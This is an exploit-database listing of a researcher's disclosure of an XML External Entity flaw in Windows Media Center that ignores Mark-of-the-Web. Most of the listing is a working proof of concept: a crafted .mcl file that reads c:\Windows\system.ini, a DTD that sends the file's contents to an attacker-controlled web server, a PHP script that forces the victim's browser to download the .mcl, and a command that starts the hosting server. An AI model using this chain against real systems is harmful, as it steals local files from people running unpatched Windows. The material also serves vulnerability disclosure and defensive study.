Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass Vulnerability

ID 1337DAY-ID-33618
Type zdt
Reporter hyp3rlinx
Modified 2019-12-03T00:00:00


Exploit for windows platform in category local exploits

                                            # Exploit Title: Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass
# Discovery by: hyp3rlinx
# Date: 2019-12-03
# Vendor Homepage:
# CVE: N/A

[+] Credits: John Page (aka hyp3rlinx)		
[+] Website:
[+] Source:
[+] ISR: Apparition Security         


Microsoft Windows Media Center

Windows Media Center is a discontinued digital video recorder and media player created by Microsoft.
Media Center was first introduced to Windows in 2002 on Windows XP Media Center.

[Vulnerability Type]
XML External Entity MotW Bypass (Anniversary Edition)

[CVE Reference]

[Security Issue]
This vulnerability was originally released by me back on December 4, 2016, yet remains unfixed.
Now, to make matters worse I will let you know "mark-of-the-web" MotW does not matter here, its just ignored.
Meaning, if the .MCL file is internet downloaded it gets the MOTW but files still exfiltrated. 

Therefore, I am releasing this "anniversary edition" XXE with important motw informations.

This is a fully working remote information disclosure vulnerability that still affects Windows 7.
Windows 7 is near end of life this January, yet it is still used by many organizations.
Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media Center but I have not tested it.

Host the "FindMeThatBiotch.dtd" DTD file in the web-root of the attacker server Port 80 etc...
Download the ".mcl" file using Microsoft Internet Explorer.

Check the MotW where you downloaded the .mcl file dir /r and note the Zone.Identifier:$DATA exists.
Open the file and BOOM! watch shitz leaving!... still vulnerable after all these years lol.

OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro

1) "M$-Wmc-Anniversary-Motw-Bypass.mcl"

# PoC
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE knobgobslob [
<!ENTITY % data666 SYSTEM "c:\Windows\system.ini">
<!ENTITY % junk SYSTEM "http://<TARGET-IP>/FindMeThatBiotch.dtd">

2) "FindMeThatBiotch.dtd"
<!ENTITY % param666 "<!ENTITY % FindMeThatBiotch SYSTEM 'http://<TARGET-IP>/%data666;'>">

3) Auto exploit PHP .mcl file downloader.

$url = 'http://<ATTACKER-IP>/M$-Wmc-Anniversary-Motw-Bypass.mcl';
header('Content-Type: application/octet-stream');
header("Content-Transfer-Encoding: Binary"); 
header("Content-disposition: attachment; filename=\"" . basename($url) . "\""); 

4) python -m SimpleHTTPServer 80

[POC Video URL]

# [2019-12-04]  #